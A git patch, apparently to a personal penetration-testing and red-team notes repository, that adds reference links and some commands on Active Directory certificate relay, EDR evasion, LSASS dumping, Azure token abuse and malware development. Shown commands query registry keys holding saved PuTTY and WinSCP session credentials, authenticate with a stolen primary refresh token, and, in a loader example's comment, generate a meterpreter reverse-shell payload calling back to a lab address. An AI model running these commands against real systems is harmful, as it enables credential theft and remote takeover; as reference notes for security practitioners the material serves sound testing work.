From 301e26296f8c4347146183dabfe597ba02d8e5e4 Mon Sep 17 00:00:00 2001
From: Sam Freeside
Date: Sat, 28 Sep 2024 02:02:51 +0300
Subject: [PATCH] [AHK] Automatic update :alien:

---
 admin/linux/README.md | 10 ++++++++++
 pentest/infrastructure/ad/ad-cs-abuse/esc8.md | 3 ++-
 pentest/infrastructure/ad/av-edr-evasion/README.md | 1 +
 .../dotnet-assembly/dotnet-in-memory-assembly.md | 1 +
 .../ad/credential-harvesting/from-memory/lsass.md | 7 +++++++
 .../ad/credential-harvesting/ssh-clients.md | 8 +++++---
 pentest/infrastructure/ad/sccm-abuse.md | 2 ++
 pentest/infrastructure/azure-ad/README.md | 7 ++++---
 pentest/infrastructure/azure-ad/prt-abuse.md | 6 ++++++
 pentest/infrastructure/lpe.md | 1 +
 redteam/maldev/README.md | 6 ++++--
 redteam/maldev/code-injection/README.md | 3 ---
 12 files changed, 43 insertions(+), 12 deletions(-)

diff --git a/admin/linux/README.md b/admin/linux/README.md
index ad4d6f8..b6bf08f 100644
--- a/admin/linux/README.md
+++ b/admin/linux/README.md
@@ -79,6 +79,16 @@ $ dig +time=1 +tcp +tries=1 +short txt ch whoami.cloudflare @1.0.0.1 | tr -d '\"
+### Internel Speed
+
+```
+$ curl https://speedtest.selectel.ru/100MB -o/dev/null
+$ curl --connect-to ::speedtest.selectel.ru https://manifest.googlevideo.com/100MB -k -o/dev/null
+$ speedtest-cli
+```
+
+
+
 ## Virtual Terminal
diff --git a/pentest/infrastructure/ad/ad-cs-abuse/esc8.md b/pentest/infrastructure/ad/ad-cs-abuse/esc8.md
index eb9207e..99723ab 100644
--- a/pentest/infrastructure/ad/ad-cs-abuse/esc8.md
+++ b/pentest/infrastructure/ad/ad-cs-abuse/esc8.md
@@ -5,8 +5,9 @@ description: NTLM Relay to AD CS HTTP Endpoints
 # ESC8
 * [https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/](https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/)
-* [https://habr.com/ru/company/deiteriylab/blog/581758/](https://habr.com/ru/company/deiteriylab/blog/581758/)
 * [https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
+* [https://habr.com/ru/company/deiteriylab/blog/581758/](https://habr.com/ru/company/deiteriylab/blog/581758/)
+* [https://habr.com/ru/companies/jetinfosystems/articles/846066/](https://habr.com/ru/companies/jetinfosystems/articles/846066/)
diff --git a/pentest/infrastructure/ad/av-edr-evasion/README.md b/pentest/infrastructure/ad/av-edr-evasion/README.md
index 32787c7..2acf62b 100644
--- a/pentest/infrastructure/ad/av-edr-evasion/README.md
+++ b/pentest/infrastructure/ad/av-edr-evasion/README.md
@@ -177,6 +177,7 @@ Note that we don't have to target the exact .NET Framework version when compilin
 - [https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec](https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec)
 - [https://github.com/icyguider/Shhhloader](https://github.com/icyguider/Shhhloader)
 - [https://hub.docker.com/repository/docker/snovvcrash/ollvm13](https://hub.docker.com/repository/docker/snovvcrash/ollvm13)
+- [https://github.com/jonpalmisc/limoncello](https://github.com/jonpalmisc/limoncello)
 Install LLVM 13.x obfuscator based on [heroims/obfuscator](https://github.com/heroims/obfuscator) and [tpoechtrager/wclang](https://github.com/tpoechtrager/wclang):
diff --git a/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md b/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md
index ed2a54c..cba9347 100644
--- a/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md
+++ b/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md
@@ -29,6 +29,7 @@
 - [https://github.com/med0x2e/ExecuteAssembly](https://github.com/med0x2e/ExecuteAssembly)
 - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)
 - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
+- [https://github.com/VoldeSec/PatchlessCLRLoader](https://github.com/VoldeSec/PatchlessCLRLoader)
diff --git a/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md b/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md
index e8e7d4f..68abacb 100644
--- a/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md
+++ b/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md
@@ -219,6 +219,13 @@ PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exi
+### SspirConnectRpc
+
+- [https://itm4n.github.io/ghost-in-the-ppl-part-2/](https://itm4n.github.io/ghost-in-the-ppl-part-2/)
+- [https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp](https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp)
+
+
+
 ### MirrorDump
 - [https://github.com/CCob/MirrorDump](https://github.com/CCob/MirrorDump)
diff --git a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
index 1c6b447..b11f7b1 100644
--- a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
+++ b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
@@ -12,7 +12,8 @@
 ```
 Cmd > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
 Cmd > reg query "HKEY_USERS\\Software\SimonTatham\PuTTY\Sessions" /s
-PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse
+PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions" -Recurse
+PS > Get-ChildItem -Path "Registry::HKEY_USERS\\Software\SimonTatham\PuTTY\Sessions" -Recurse
 ```
@@ -26,11 +27,12 @@ PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse
 - [https://winscp.net/eng/docs/faq_password](https://winscp.net/eng/docs/faq_password)
 - [https://github.com/anoopengineer/winscppasswd](https://github.com/anoopengineer/winscppasswd)
-- [https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life](https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life)
+- [https://snovvcrash.rocks/2021/08/07/htb-rpg.html](https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life)
 ```
 Cmd > reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
 Cmd > reg query "HKEY_USERS\\Software\Martin Prikryl\WinSCP 2\Sessions" /s
 Cmd > for /f "tokens=*" %a in ('reg query "HKEY_USERS" ^| findstr /r "S-1-5-.*"') do @reg query "%a\Software\Martin Prikryl\WinSCP 2\Sessions" /s
-PS > Get-ChildItem -Path "HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions\" -Recurse
+PS > Get-ChildItem -Path "HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions" -Recurse
+PS > Get-ChildItem -Path "Registry::HKEY_USERS\\Software\Martin Prikryl\WinSCP 2\Sessions" -Recurse
 ```
diff --git a/pentest/infrastructure/ad/sccm-abuse.md b/pentest/infrastructure/ad/sccm-abuse.md
index 38b58f0..aa8c413 100644
--- a/pentest/infrastructure/ad/sccm-abuse.md
+++ b/pentest/infrastructure/ad/sccm-abuse.md
@@ -10,6 +10,8 @@ description: System Center Configuration Manager / Microsoft Endpoint Configurat
 - [https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/](https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/)
 - [https://http418infosec.com/offensive-sccm-summary](https://http418infosec.com/offensive-sccm-summary)
+{% embed url="https://github.com/subat0mik/Misconfiguration-Manager/blob/main/README.md#sccm-attack-matrix" caption="Misconfiguration Manager / SCCM Attack Matrix" %}
+
diff --git a/pentest/infrastructure/azure-ad/README.md b/pentest/infrastructure/azure-ad/README.md
index 3493e99..b9ad866 100644
--- a/pentest/infrastructure/azure-ad/README.md
+++ b/pentest/infrastructure/azure-ad/README.md
@@ -49,11 +49,12 @@ $ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --ra
 - [https://github.com/dirkjanm/ROADtools](https://github.com/dirkjanm/ROADtools?tab=readme-ov-file#using-roadrecon)
 ```
-$ roadrecon auth --device-code
-$ roadrecon gather
-$ roadrecon gui
+$ roadrecon auth --device-code [-ua '']
+$ roadrecon gather [-d megacorp.db] [-ua '']
+$ roadrecon gui [-d megacorp.db]
 ```
+
 #### AzureHound
 - [https://github.com/BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound/releases/latest)
diff --git a/pentest/infrastructure/azure-ad/prt-abuse.md b/pentest/infrastructure/azure-ad/prt-abuse.md
index 18f82ce..84b3e58 100644
--- a/pentest/infrastructure/azure-ad/prt-abuse.md
+++ b/pentest/infrastructure/azure-ad/prt-abuse.md
@@ -7,6 +7,12 @@ description: Primary Refresh Tokens
 - [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
 - [https://aadinternals.com/post/prt/](https://aadinternals.com/post/prt/)
+```
+$ roadrecon auth --prt-init
+Cmd > ROADToken.exe
+$ [proxychains] roadrecon auth [-d megacorp.db] --prt-cookie [-ua '']
+```
+
diff --git a/pentest/infrastructure/lpe.md b/pentest/infrastructure/lpe.md
index ae8ce87..4ece74e 100644
--- a/pentest/infrastructure/lpe.md
+++ b/pentest/infrastructure/lpe.md
@@ -698,6 +698,7 @@ done
 ### Old Ubuntu Quick Deploy (Cheatsheet)
 - [http://old-releases.ubuntu.com/releases/](http://old-releases.ubuntu.com/releases/)
+- [https://hummelchen.gitbook.io/linux_lpe](https://hummelchen.gitbook.io/linux_lpe)
 ```
 $ sudo sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list
diff --git a/redteam/maldev/README.md b/redteam/maldev/README.md
index 3c40883..ad1c2fc 100644
--- a/redteam/maldev/README.md
+++ b/redteam/maldev/README.md
@@ -5,6 +5,8 @@
 - [https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/](https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/)
 - [https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/](https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/)
+{% embed url="https://gist.github.com/0prrr/c0954a638c55ab4b39e8b02ef312e806" caption="Malware Dev Reading List, 0prrr/All-Mal-Dev.md" %}
+
 [EIKAR](https://ru.wikipedia.org/wiki/EICAR-Test-File) test file:
 ```
@@ -16,16 +18,16 @@ $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}
 ## Blog Series / Books
-- [https://cocomelonc.github.io/](https://cocomelonc.github.io/)
-
 ### PE Structure
+- [https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/](https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/#the-common-ground)
 - [https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/](https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/)
 - [https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html](https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html)
 - [https://print3m.github.io/blog/x64-winapi-shellcoding](https://print3m.github.io/blog/x64-winapi-shellcoding)
 - [https://habr.com/ru/articles/808787/](https://habr.com/ru/articles/808787/)
+- [https://nikhilh-20.github.io/blog/peb_phobos_ransomware/](https://nikhilh-20.github.io/blog/peb_phobos_ransomware/)
 ![PE File Structure (by @Print3M)](https://print3m.github.io/imgs/x64-shellcoding-winapi/pe-structure.png)
diff --git a/redteam/maldev/code-injection/README.md b/redteam/maldev/code-injection/README.md
index e6742d8..50ba006 100644
--- a/redteam/maldev/code-injection/README.md
+++ b/redteam/maldev/code-injection/README.md
@@ -21,12 +21,9 @@
 {% tab title="Windows" %}
 {% code title="loader.c" %}
 ```c
-#include
 #include
-
 // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw -o met.bin --encrypt xor --encrypt-key a
 // xxd -i met.bin > shellcode.h
-#include
 #include "shellcode.h"
 int main() {